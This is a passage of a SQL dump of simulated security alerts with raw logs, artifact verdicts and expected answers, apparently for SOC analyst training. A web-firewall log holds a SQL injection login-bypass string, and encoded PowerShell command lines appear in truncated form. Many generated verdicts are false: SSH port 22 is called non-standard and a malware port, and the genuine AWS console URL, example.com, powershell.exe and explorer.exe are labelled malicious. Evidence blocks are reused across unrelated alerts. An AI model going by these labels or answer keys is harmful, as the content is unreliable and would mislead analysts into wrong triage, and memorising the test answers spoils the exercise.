81%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"port\",\"value\":\"44832\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 44832 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'NDR', 1, 0, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(226, 'Unauthorized Access Attempt Detected', 'high', 'network', 'Multiple failed login attempts were detected from a foreign IP address, potentially indicating a brute force attack targeting the SSH service.', 'Unauthorized Access', 'T1110 - Brute Force', 1, 'investigating', 96, '{\"timestamp\":\"2023-10-29T02:41:27Z\",\"event_type\":\"authentication_failed\",\"service\":\"SSH\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username_attempts\":[\"admin\",\"root\",\"testuser\"],\"failed_attempts_count\":15,\"alert_threshold_exceeded\":true,\"geo_location\":\"New Zealand\",\"session_id\":\"9H4F5J2K3M\",\"network_info\":{\"src_port\":58764,\"dest_port\":22,\"protocol\":\"TCP\"}}', '2025-12-25 05:07:28', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 203.0.113.45 reported 322 times for malicious activity. Abuse confidence score: 87%.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.1.10 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_3\",\"type\":\"geolocation\",\"value\":\"New Zealand\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from New Zealand - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"port\",\"value\":\"58764\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 58764 commonly used by malware for C2 communication.\"}},{\"id\":\"artifact_5\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(227, 'Unauthorized AWS Access Attempt Detected', 'high', 'AWS CloudTrail', 'An unauthorized login attempt was detected in AWS account using an anomalous IP address. IP address associated with known threat actor activities. This matches the MITRE ATT&CK technique for Valid Accounts (T1078).', 'Unauthorized Access', 'T1078', 1, 'Closed', 95, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLEUSER\",\"arn\":\"arn:aws:iam::123456789012:user/example_user\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLEKEYID\",\"userName\":\"example_user\"},\"eventTime\":\"2023-10-12T14:55:55Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"192.0.2.99\",\"userAgent\":\"Mozilla/5.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"LoginTo\":\"https://console.aws.amazon.com/\",\"MobileVersion\":\"No\",\"MFAUsed\":\"No\"},\"eventID\":\"abcd1234-5678-90ab-cdef-EXAMPLE123456\",\"readOnly\":false,\"eventType\":\"AwsConsoleSignIn\",\"recipientAccountId\":\"123456789012\"}', '2025-12-25 05:00:07', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 192.0.2.99 reported 479 times for malicious activity. Abuse confidence score: 84%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"example_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"Failure\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"geolocation\",\"value\":\"us-east-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-east-1 - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"https://console.aws.amazon.com/\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"URL hosts credential harvesting page mimicking legitimate login portal.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.822Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLEUSER\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/example_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"EXAMPLEKEYID\\\",\\\"userName\\\":\\\"example_user\\\"},\\\"eventTime\\\":\\\"2023-10-12T14:55:55Z\\\",\\\"eventSource\\\":\\\"signin.amazonaws.com\\\",\\\"eventName\\\":\\\"ConsoleLogin\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"192.0.2.99\\\",\\\"userAgent\\\":\\\"Mozilla/5.0\\\",\\\"errorMessage\\\":\\\"Failed authentication\\\",\\\"requestParameters\\\":null,\\\"responseElements\\\":{\\\"ConsoleLogin\\\":\\\"Failure\\\"},\\\"additionalEventData\\\":{\\\"LoginTo\\\":\\\"https://console.aws.amazon.com/\\\",\\\"MobileVersion\\\":\\\"No\\\",\\\"MFAUsed\\\":\\\"No\\\"},\\\"eventID\\\":\\\"abcd1234-5678-90ab-cdef-EXAMPLE123456\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsConsoleSignIn\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(228, 'Unauthorized Access Attempt on Web Application', 'high', 'web_application_firewall', 'Detected multiple SQL injection attempts from a single IP address. The requests aimed at exploiting vulnerabilities in the login form.', 'intrusion_attempt', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:35:23Z\",\"waf_id\":\"waf-01\",\"client_ip\":\"192.168.5.87\",\"request_method\":\"POST\",\"requested_url\":\"/login\",\"http_version\":\"HTTP/1.1\",\"alert_trigger\":\"SQL_Injection_Detect\",\"request_headers\":{\"Host\":\"example.com\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"},\"request_body\":\"username=admin\' OR \'1\'=\'1\' -- &password=pwd123\",\"rule_id\":\"981245\",\"rule_message\":\"Possible SQL injection attack detected\"}', '2025-12-25 05:55:11', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.87\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.5.87 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"57/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(229, 'Suspicious PowerShell Script Executed', 'high', 'endpoint', 'A PowerShell script was executed with potentially malicious behavior, indicating possible PowerShell exploitation tactics.', 'process', 'T1059.001', 1, 'Closed', 137, '{\"timestamp\":\"2023-10-25T14:22:11Z\",\"host\":\"DESKTOP-5GH7JAM\",\"user\":\"JohnDoe\",\"process_id\":4380,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoP -NonI -W Hidden -Enc WnNvR... (encapsulated malicious command)\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process_id\":374,\"parent_process_name\":\"explorer.exe\",\"integrity_level\":\"Medium\",\"session_id\":2}', '2025-12-25 15:32:46', '2026-02-13 13:10:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"JohnDoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"54/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(230, 'Suspicious Domain Name Resolution Detected', 'high', 'DNS Security', 'A DNS request was made to a domain known for distributing malware. This domain has been flagged in multiple threat intelligence databases.', 'Malware', 'T1071', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"victim-machine\",\"domain\":\"maliciousdomain.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2025-12-25 21:24:21', '2026-02-18 13:54:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 352 times for hosting malware distribution sites.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain and associated IP have been confirmed malicious through OSINT. Blocking the IP and isolating the host will prevent further compromise.\"}', 'Intermediate', 'TI', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"victim-machine\\\",\\\"domain\\\":\\\"maliciousdomain.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(231, 'Suspicious PSExec Activity Detected on Internal Network', 'high', 'CrowdStrike', 'A suspicious PSExec process was initiated from an internal machine attempting lateral movement across the network. The source machine is exhibiting signs of compromise.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION01\",\"file_hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"process_name\":\"psexec.exe\"}', '2025-12-25 21:27:43', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash observed in known malware campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and the malicious hash associated with known malware campaigns indicates a true positive for lateral movement within the network.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
